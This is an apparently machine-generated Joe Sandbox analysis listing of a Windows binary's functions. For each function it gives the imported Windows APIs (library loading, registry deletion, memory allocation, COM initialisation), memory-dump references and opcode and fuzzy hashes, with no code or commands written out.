                                                                                                                                                                                      • Instruction Fuzzy Hash: F0112371284208BFEB205F61CC06FEB3BACEFC8B58F114118FA51A6090D272A851DB20
                                                                                                                                                                                      Function 00922F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00923028,?), ref: 00922F79
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00922F80
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                                                                                      • API String ID: 2574300362-340411864
                                                                                                                                                                                      • Opcode ID: 51a2ce943163530bce690988c666fd420e35967dd6f21a742fc55466681c83f0
                                                                                                                                                                                      • Instruction ID: 53dce87a413dd778fb05a579119c2ad6f49cab1b704420205128c0855b9afcc3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 51a2ce943163530bce690988c666fd420e35967dd6f21a742fc55466681c83f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE01A70ABD304EADB206F70EE8DF557668AB89B16F140024B102D21E0CBB58040FF08
                                                                                                                                                                                      Function 00923034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00922F4E), ref: 0092304E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00923055
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                      • API String ID: 2574300362-2819208100
                                                                                                                                                                                      • Opcode ID: 569faf24ba4a09a8f97676f534e159e3ddb606d147e67a6d44644f42936acf58
                                                                                                                                                                                      • Instruction ID: 33fbe27f4c2bb422fd7cdca47be5a8a20eb016a852df4e16b442ccaa4721b57e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 569faf24ba4a09a8f97676f534e159e3ddb606d147e67a6d44644f42936acf58
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE09270AAE204EBDB246BA1EE0DF057A68B781B16F140114F109912F0CBB88500AB28
                                                                                                                                                                                      Function 0097BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                                                                                      • Opcode ID: 3c61c89691a4c2ebbb1756eaed270d7e5e4114b171c51d3eabbfde9dc764b738
                                                                                                                                                                                      • Instruction ID: 55d528de1cda03e19a01a881d3582dc8473ca8c6a09abd34d949dd47ccc3b13d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c61c89691a4c2ebbb1756eaed270d7e5e4114b171c51d3eabbfde9dc764b738
                                                                                                                                                                                      • Instruction Fuzzy Hash: D2E0EC7280811CFACA18EB909D06AFA73BCAB04300F508892B91A91044E3399B54AB12
                                                                                                                                                                                      Function 0091E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0091E69C,74DF0AE0,0091E5AC,0099DC28,?,?), ref: 0091E6B4
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0091E6C6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                                                                                      • Opcode ID: 0d5f33da33aaec6009f999d4ed08aac2c33e0a63b071d1d197a467e8d7978b61
                                                                                                                                                                                      • Instruction ID: 7f81be1a03a9286a7c7efe452458c585b933a93e296a4f3f2577459dcef19d97
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d5f33da33aaec6009f999d4ed08aac2c33e0a63b071d1d197a467e8d7978b61
                                                                                                                                                                                      • Instruction Fuzzy Hash: BBD0A7345183129FD7219F31E80C68637D8EF64715B405419E855D22A0D770C4C0C710
                                                                                                                                                                                      Function 0091E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0091E6D9,?,0091E55B,0099DC28,?,?), ref: 0091E6F1
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0091E703
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                      • API String ID: 2574300362-3024904723
                                                                                                                                                                                      • Opcode ID: 24b98737a220d43577f75f56feb1809be8155f022a2856b346da8f6477423eb5
                                                                                                                                                                                      • Instruction ID: 03d2a297eb3c353e9123f26ffea779baa65bf65648a8a911b9d6531ee69bcf16
                                                                                                                                                                                      • Opcode Fuzzy Hash: 24b98737a220d43577f75f56feb1809be8155f022a2856b346da8f6477423eb5
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8D0A7345183129FEB282F21E84C6873BD8FF05714B004519E895D22D0D770C8C08710
                                                                                                                                                                                      Function 0095EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0095EBAF,?,0095EAAC), ref: 0095EBC7
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0095EBD9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                                      • Opcode ID: a09dd6b86aa9207e9ff817d48be14dd06d4cf98be368db2123786555341636e0
                                                                                                                                                                                      • Instruction ID: 1b991ec6d42d76b07bbee87078d5b1a2f94551629ff183cac47cd27782fd7374
                                                                                                                                                                                      • Opcode Fuzzy Hash: a09dd6b86aa9207e9ff817d48be14dd06d4cf98be368db2123786555341636e0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 84D0A73441C3129FDB245F33E88CA4537D8AF0471AB509419F856D1290DB70D8808710
                                                                                                                                                                                      Function 009413A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00941371,?,00941519), ref: 009413B4
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 009413C6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                                      • API String ID: 2574300362-1587604923
                                                                                                                                                                                      • Opcode ID: 696fe27b724bee1e974d31564f21e7b63d6fafd18aaf13a1c661063e4dd09190
                                                                                                                                                                                      • Instruction ID: 1a4cfbc1b621a519e2ac66d56110c195943978a8048a07ee8d565e8bfafed730
                                                                                                                                                                                      • Opcode Fuzzy Hash: 696fe27b724bee1e974d31564f21e7b63d6fafd18aaf13a1c661063e4dd09190
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FD0A93182D312AFD7245F65EC4CA8237ECAF80728F008429F496D26A0EAB0C8C08B10
                                                                                                                                                                                      Function 0094137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,0094135F,?,00941440), ref: 00941389
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0094139B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                                      • API String ID: 2574300362-1071820185
                                                                                                                                                                                      • Opcode ID: 46fb77ae50547b501c7d1b3417f36c9445d2435e05a75dc62392d8005900d785
                                                                                                                                                                                      • Instruction ID: 662a657488bd68249eb94c7c94f88845ca22fd08de675724523d93d96b0e5ab9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46fb77ae50547b501c7d1b3417f36c9445d2435e05a75dc62392d8005900d785
                                                                                                                                                                                      • Instruction Fuzzy Hash: C5D0A930828712AFD720AF65EC0CB8237E8AF44728F048829E485D2A90DAB0D8C0AB10
                                                                                                                                                                                      Function 00963ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00963AC2,?,00963CF7), ref: 00963ADA
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00963AEC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                                                                                      • Opcode ID: 719ceec063ce405261677884958143b0a34e45642f03915c0551acb660dfe3e9
                                                                                                                                                                                      • Instruction ID: d1de0b017fd328d2dc257cdda375eb8d30458b251014b689e181ed76a0215a1f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 719ceec063ce405261677884958143b0a34e45642f03915c0551acb660dfe3e9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED0A7304193239FD7204F60E84D68137D8AF11718B10C41DE4D5D1790EFF0C480E710
                                                                                                                                                                                      Function 0090AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00956AA6), ref: 0090AB2D
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0090AB49
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharUpper_wcscmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 820872866-0
                                                                                                                                                                                      • Opcode ID: c4909c1c872e1fe14ca1a3d48902fad51433e77cef8350637304407dbc8fa038
                                                                                                                                                                                      • Instruction ID: 90d6923039c2fabbe0ae6cac67b798be07f63dab6957c26544ab845d6b0468c7
                                                                                                                                                                                      • Opcode Fuzzy Hash: c4909c1c872e1fe14ca1a3d48902fad51433e77cef8350637304407dbc8fa038
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13A1027170020A9FDB14EF25E9816ADBBA5FF44310F64456AEC56872E0EB349870D786
                                                                                                                                                                                      Function 00960D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00960D85
                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00960DC8
                                                                                                                                                                                        • Part of subcall function 00960458: CharLowerBuffW.USER32(?,?,?,?), ref: 00960478
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00960FB2
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00960FC2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3659485706-0
                                                                                                                                                                                      • Opcode ID: 89fffac84da4b1dd63607f7321856549fc113dd371ddbcb81baebf81f5a43afb
                                                                                                                                                                                      • Instruction ID: f1cf9930215569818d6aea826a5974a406e27ac4740cda9c7fe8c843c0a9b473
                                                                                                                                                                                      • Opcode Fuzzy Hash: 89fffac84da4b1dd63607f7321856549fc113dd371ddbcb81baebf81f5a43afb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AB17E756043009FC714DF28C490A6AB7E4EFC9714F14896EF88A9B3A2DB31ED45CB91
                                                                                                                                                                                      Function 0095AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0095AF56
                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0095AF61
                                                                                                                                                                                        • Part of subcall function 00941050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009410B8
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0095AF6C
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0095B23F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 780911581-0
                                                                                                                                                                                      • Opcode ID: 333ef9e59a5410f64f8dbc615ae97f0106419d9a50d4e32c530c62d15ffa492e
                                                                                                                                                                                      • Instruction ID: e1b1b126416236005e1c459f5ce423dc5a49c380bfcb211acc30b35a4d7887b5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 333ef9e59a5410f64f8dbc615ae97f0106419d9a50d4e32c530c62d15ffa492e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 93A15A75704701AFCB10DF25C891B1AB7E5BF98360F058459F999AB3A2CB30ED44CB92
                                                                                                                                                                                      Function 0090C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memmove.LIBCMT ref: 0090C419
                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00946653,?,?,00000000), ref: 0090C495
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1325644223-0
                                                                                                                                                                                      • Opcode ID: e57f8cec5c1e82be667d6aa8c3bf6018317765be4a41923c56ea589c92ff33ff
                                                                                                                                                                                      • Instruction ID: 0056d57fa14c8355ff5579544b75b263a7ce625c55631a42d3d1105ad784decd
                                                                                                                                                                                      • Opcode Fuzzy Hash: e57f8cec5c1e82be667d6aa8c3bf6018317765be4a41923c56ea589c92ff33ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EA1DDB1A04619EFDB00CF65C880BADFBB4FF05300F14C699E8699B296D735E960DB91
                                                                                                                                                                                      Function 009242EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3877424927-0
